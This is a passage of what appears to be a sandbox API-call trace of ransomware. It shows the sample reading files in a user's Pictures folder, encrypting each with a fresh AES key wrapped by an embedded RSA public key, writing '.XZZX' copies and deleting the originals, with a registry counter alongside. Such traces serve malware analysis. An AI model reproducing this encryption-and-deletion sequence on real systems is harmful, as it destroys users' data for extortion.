LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0122.151] OutputDebugStringW (lpOutputString="end") [0122.151] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`ÕI\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x449dbf4, pcbBinary=0x449d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x449dbf4, pcbBinary=0x449d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0122.151] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x449dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x449d3dc, pcbStructInfo=0x449d3d8 | out: pvStructInfo=0x449d3dc, pcbStructInfo=0x449d3d8) returned 1 [0122.151] CryptAcquireContextW (in: phProv=0x449d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x449d3e4*=0x3ce1d30) returned 1 [0122.152] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce1d30, dwCertEncodingType=0x1, pInfo=0x3cb1c48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1c78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1c80*, PublicKey.cUnusedBits=0x0), phKey=0x449d3ec | out: phKey=0x449d3ec*=0x3a6090) returned 1 [0122.152] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0122.152] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0122.152] CryptEncrypt (in: hKey=0x3a6090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x449d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x449d3f0*=0x80) returned 1 [0122.152] CryptEncrypt (in: hKey=0x3a6090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce1db8*, pdwDataLen=0x449d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce1db8*, pdwDataLen=0x449d3e8*=0x80) returned 1 [0122.152] WriteFile (in: hFile=0x5c0, lpBuffer=0x3ce1db8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce1db8*, lpNumberOfBytesWritten=0x449e438*=0x80, lpOverlapped=0x0) returned 1 [0122.152] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0122.152] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0122.152] GetUserNameW (in: lpBuffer=0x449e1f8, pcbBuffer=0x449dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x449dfe0) returned 1 [0122.153] wsprintfW (in: param_1=0x449dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0122.153] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x449dfe4 | out: phkResult=0x449dfe4*=0x5c4) returned 0x0 [0122.153] RegQueryValueExW (in: hKey=0x5c4, lpValueName="E1010314", lpReserved=0x0, lpType=0x449dfd8, lpData=0x449dfec, lpcbData=0x449dfdc*=0x4 | out: lpType=0x449dfd8*=0x4, lpData=0x449dfec*=0x86, lpcbData=0x449dfdc*=0x4) returned 0x0 [0122.153] RegCloseKey (hKey=0x5c4) returned 0x0 [0122.153] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x449dfe8 | out: phkResult=0x449dfe8*=0x5c4) returned 0x0 [0122.153] RegSetValueExW (in: hKey=0x5c4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x449dfec*=0x87, cbData=0x4 | out: lpData=0x449dfec*=0x87) returned 0x0 [0122.153] RegCloseKey (hKey=0x5c4) returned 0x0 [0122.154] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.154] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.154] CloseHandle (hObject=0x5c0) returned 1 [0122.155] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0122.156] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0122.156] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bqBGtF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqbgtf.bmp")) returned 1 [0122.157] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bqBGtF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqbgtf.bmp")) returned 0 Thread: id = 399 os_tid = 0x94c [0122.159] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.159] lstrcpyW (in: lpString1=0x420f460, lpString2="bz3TQY.png" | out: lpString1="bz3TQY.png") returned="bz3TQY.png" [0122.159] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.159] SetErrorMode (uMode=0x1) returned 0x1 [0122.159] lstrcpyW (in: lpString1=0x420f860, lpString2="bz3TQY.png" | out: lpString1="bz3TQY.png") returned="bz3TQY.png" [0122.159] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x8f863c8e, Data2=0x7386, Data3=0x41b6, Data4=([0]=0xa9, [1]=0x5d, [2]=0xee, [3]=0x99, [4]=0xda, [5]=0xa7, [6]=0x21, [7]=0xda))) returned 0x0 [0122.159] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bz3TQY.png") returned 53 [0122.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0122.159] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6D777C541DA727448F863C8E21C80B8C.XZZX") returned 80 [0122.159] StrStrW (lpFirst="bz3TQY.png", lpSrch="XZZX") returned 0x0 [0122.159] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bz3TQY.png", dwFileAttributes=0x20) returned 1 [0122.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bz3TQY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz3tqy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0122.160] ReadFile (in: hFile=0x5c8, lpBuffer=0x3ce77e0, nNumberOfBytesToRead=0x258a, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce77e0*, lpNumberOfBytesRead=0x420e418*=0x258a, lpOverlapped=0x0) returned 1 [0122.161] CloseHandle (hObject=0x5c8) returned 1 [0122.161] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0122.162] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0122.162] SetErrorMode (uMode=0x1) returned 0x1 [0122.162] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0122.162] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1e40) returned 1 [0122.165] CryptGenKey (in: hProv=0x3ce1e40, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a6110) returned 1 [0123.038] CryptExportKey (in: hKey=0x3a6110, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0123.038] CryptExportKey (in: hKey=0x3a6110, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0123.038] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.039] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0123.039] CryptDestroyKey (hKey=0x3a6110) returned 1 [0123.039] CryptReleaseContext (hProv=0x3ce1fd8, dwFlags=0x0) returned 0 [0123.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6D777C541DA727448F863C8E21C80B8C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6d777c541da727448f863c8e21c80b8c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0123.040] WriteFile (in: hFile=0x5cc, lpBuffer=0x3ce77e0*, nNumberOfBytesToWrite=0x258a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce77e0*, lpNumberOfBytesWritten=0x420e438*=0x258a, lpOverlapped=0x0) returned 1 [0123.040] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x258a [0123.041] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0123.041] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x258f [0123.041] WriteFile (in: hFile=0x5cc, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x14, lpOverlapped=0x0) returned 1 [0123.041] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x25a3 [0123.041] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0123.041] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x25a8 [0123.041] SetErrorMode (uMode=0x1) returned 0x1 [0123.041] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0123.041] OutputDebugStringW (lpOutputString="end") [0123.041] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0123.041] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0123.041] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce2170) returned 1 [0123.042] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2170, dwCertEncodingType=0x1, pInfo=0x3cb1eb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1ee8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1ef0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a6110) returned 1 [0123.042] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.043] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0123.043] CryptEncrypt (in: hKey=0x3a6110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0123.043] CryptEncrypt (in: hKey=0x3a6110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce21f8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce21f8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0123.043] WriteFile (in: hFile=0x5cc, lpBuffer=0x3ce21f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce21f8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0123.043] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0123.043] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0123.043] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0123.043] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0123.044] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5d0) returned 0x0 [0123.044] RegQueryValueExW (in: hKey=0x5d0, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x88, lpcbData=0x420dfdc*=0x4) returned 0x0 [0123.044] RegCloseKey (hKey=0x5d0) returned 0x0 [0123.044] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5d0) returned 0x0 [0123.044] RegSetValueExW (in: hKey=0x5d0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x89, cbData=0x4 | out: lpData=0x420dfec*=0x89) returned 0x0 [0123.044] RegCloseKey (hKey=0x5d0) returned 0x0 [0123.044] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.044] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.045] CloseHandle (hObject=0x5cc) returned 1 [0123.046] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0123.046] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0123.046] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bz3TQY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz3tqy.png")) returned 1 [0123.048] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bz3TQY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz3tqy.png")) returned 0 Thread: id = 400 os_tid = 0x950 [0122.372] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.372] lstrcpyW (in: lpString1=0x434f460, lpString2="dcuecnaq5mY4vS.jpg" | out: lpString1="dcuecnaq5mY4vS.jpg") returned="dcuecnaq5mY4vS.jpg" [0122.372] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.372] SetErrorMode (uMode=0x1) returned 0x1 [0122.372] lstrcpyW (in: lpString1=0x434f860, lpString2="dcuecnaq5mY4vS.jpg" | out: lpString1="dcuecnaq5mY4vS.jpg") returned="dcuecnaq5mY4vS.jpg" [0122.372] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xaf6b05f6, Data2=0x31d8, Data3=0x4918, Data4=([0]=0xb0, [1]=0x35, [2]=0x50, [3]=0xdd, [4]=0x7a, [5]=0x44, [6]=0x16, [7]=0x2a))) returned 0x0 [0122.372] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dcuecnaq5mY4vS.jpg") returned 61 [0122.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0122.372] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7E711D900E3B4440AF6B05F612702888.XZZX") returned 80 [0122.372] StrStrW (lpFirst="dcuecnaq5mY4vS.jpg", lpSrch="XZZX") returned 0x0 [0122.372] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dcuecnaq5mY4vS.jpg", dwFileAttributes=0x20) returned 1 [0122.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dcuecnaq5mY4vS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dcuecnaq5my4vs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0122.373] ReadFile (in: hFile=0x5b0, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x168e4, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x434e418*=0x168e4, lpOverlapped=0x0) returned 1 [0122.374] CloseHandle (hObject=0x5b0) returned 1 [0122.374] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0122.375] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0122.375] SetErrorMode (uMode=0x1) returned 0x1 [0122.375] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0122.375] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1ec8) returned 1 [0122.378] CryptGenKey (in: hProv=0x3ce1ec8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a6150) returned 1 [0123.016] CryptExportKey (in: hKey=0x3a6150, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0123.016] CryptExportKey (in: hKey=0x3a6150, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0123.016] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.016] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0123.016] CryptDestroyKey (hKey=0x3a6150) returned 1 [0123.016] CryptReleaseContext (hProv=0x3ce1fd8, dwFlags=0x0) returned 0 [0123.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7E711D900E3B4440AF6B05F612702888.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7e711d900e3b4440af6b05f612702888.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e0 [0123.017] WriteFile (in: hFile=0x5e0, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x168e4, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x434e438*=0x168e4, lpOverlapped=0x0) returned 1 [0123.019] SetFilePointer (in: hFile=0x5e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x168e4 [0123.019] WriteFile (in: hFile=0x5e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0123.019] SetFilePointer (in: hFile=0x5e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x168e9 [0123.019] WriteFile (in: hFile=0x5e0, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x24, lpOverlapped=0x0) returned 1 [0123.019] SetFilePointer (in: hFile=0x5e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1690d [0123.019] WriteFile (in: hFile=0x5e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0123.019] SetFilePointer (in: hFile=0x5e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16912 [0123.019] SetErrorMode (uMode=0x1) returned 0x1 [0123.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 